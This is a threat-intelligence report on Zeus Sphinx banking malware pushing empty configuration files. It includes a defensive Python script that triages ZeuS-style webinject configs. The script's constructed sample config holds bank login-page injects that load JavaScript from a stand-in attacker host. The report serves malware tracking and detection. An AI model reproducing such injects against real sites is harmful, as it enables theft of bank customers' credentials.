Zeus Sphinx Pushes Empty Configuration Files
Summary
Recent Zeus Sphinx samples have fetched configuration files from which all target URLs were removed. Sphinx infection campaigns continue and the malware can still compromise new machines, but the resulting bots sit idle: they receive no attack instructions naming specific banks or banking services.
The only instruction that repeats across all Sphinx configurations is to inject the victim's "bot ID" into every page they visit. In essence this is a webinject whose URL mask is http*://*, which matches any HTTP or HTTPS page the victim browses to.
This phase of empty Sphinx configuration files began in March 2017 and has spread over the past few months to all Sphinx samples. That suggests Sphinx is presently operated by a single group rather than multiple actors, even though it was sold commercially in the underground when it launched in 2015.
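To make the "empty configuration" observation checkable, the following is an added triage script (not code from the original pulse or from the Sphinx authors). It assumes the classic ZeuS webinjects.txt layout that Sphinx inherits (`set_url <mask> <flags>` followed by `data_before` / `data_inject` / `data_after` blocks, each closed by `data_end`); the two sample configs, the `%BOTID%` placeholder and the `.example` / `.invalid` hosts are constructed for the demonstration. It parses the config, lists the bank domains actually targeted, shows which payloads fire on every page via the catch-all mask, and classifies the config as `empty`, `active`, or `no injects`:

```python
import re
from dataclasses import dataclass

# Masks that match every page the victim opens; "http*://*" is the catch-all
# mask from the configs described above.
WILDCARD_MASKS = {"http*://*", "*://*", "http://*", "https://*"}

@dataclass
class Webinject:
    url_mask: str        # glob-style URL mask, "*" matches any run of characters
    flags: str           # e.g. "GP": apply on GET and POST
    before: str = ""     # data_before block
    inject: str = ""     # data_inject block (the payload)
    after: str = ""      # data_after block

def parse_webinjects(text: str) -> list[Webinject]:
    """Parse the classic ZeuS webinjects.txt layout (an assumption here)."""
    entries: list[Webinject] = []
    cur, section, buf = None, None, []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("set_url "):
            if cur is not None:
                entries.append(cur)
            parts = line.split(None, 2)
            cur = Webinject(parts[1], parts[2] if len(parts) > 2 else "")
            section = None
        elif cur is None:
            continue                     # text before the first set_url
        elif line in ("data_before", "data_inject", "data_after"):
            section, buf = line[5:], []  # -> "before" / "inject" / "after"
        elif line == "data_end" and section is not None:
            setattr(cur, section, "\n".join(buf))
            section = None
        elif section is not None:
            buf.append(raw.rstrip("\r\n"))
    if cur is not None:
        entries.append(cur)
    return entries

def mask_matches(mask: str, url: str) -> bool:
    """True if a ZeuS mask covers the URL (each '*' becomes '.*')."""
    pattern = "^" + ".*".join(re.escape(p) for p in mask.split("*")) + "$"
    return re.match(pattern, url, re.IGNORECASE) is not None

def is_wildcard(mask: str) -> bool:
    return mask in WILDCARD_MASKS

def targeted_domains(entries: list[Webinject]) -> list[str]:
    """Hosts named by non-wildcard masks, with any leading '*.' stripped."""
    hosts = set()
    for e in entries:
        if is_wildcard(e.url_mask):
            continue
        m = re.match(r"^[a-z*]+://([^/]+)", e.url_mask, re.IGNORECASE)
        if m:
            hosts.add(m.group(1).lstrip("*.").lower())
    return sorted(hosts)

def wildcard_payloads(entries: list[Webinject]) -> list[str]:
    """Inject bodies that fire on every page; a bot-ID beacon lives here."""
    return [e.inject for e in entries if is_wildcard(e.url_mask)]

def triage(text: str) -> dict:
    """Classify a config: 'no injects', 'empty' (catch-all only) or 'active'."""
    entries = parse_webinjects(text)
    if not entries:
        status = "no injects"
    elif all(is_wildcard(e.url_mask) for e in entries):
        status = "empty"
    else:
        status = "active"
    return {"status": status, "entries": len(entries),
            "targets": targeted_domains(entries),
            "wildcard_payloads": wildcard_payloads(entries)}

# Constructed sample configs (not real Sphinx configs). %BOTID% stands in for
# whatever identifier the real bot substitutes into the page.
EMPTY_CONFIG = """\
set_url http*://* GP
data_before
<head>
data_end
data_inject
<!-- botid: %BOTID% -->
data_end
data_after
data_end
"""

ACTIVE_CONFIG = EMPTY_CONFIG + """\
set_url https://*.bank-a.example/login* GP
data_before
</head>
data_end
data_inject
<script src="https://injects.attacker.invalid/a.js"></script>
data_end
data_after
data_end
set_url http*://online.bank-b.example/* GP
data_inject
<script src="https://injects.attacker.invalid/b.js"></script>
data_end
"""

if __name__ == "__main__":
    for name, cfg in (("EMPTY_CONFIG", EMPTY_CONFIG), ("ACTIVE_CONFIG", ACTIVE_CONFIG)):
        print(name, triage(cfg))
```

The classification hinges on `all(is_wildcard(...))`: a config that contains only catch-all entries is the idle state the pulse describes, even though the bot still executes one inject on every page. When tracking a campaign, the `targets` list over successive config pulls is the signal that the operator has started assigning banks again.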
Created: 2026-02-23
Indicators
No indicators were found.
Related CVEs
No CVEs were found in this Pulse.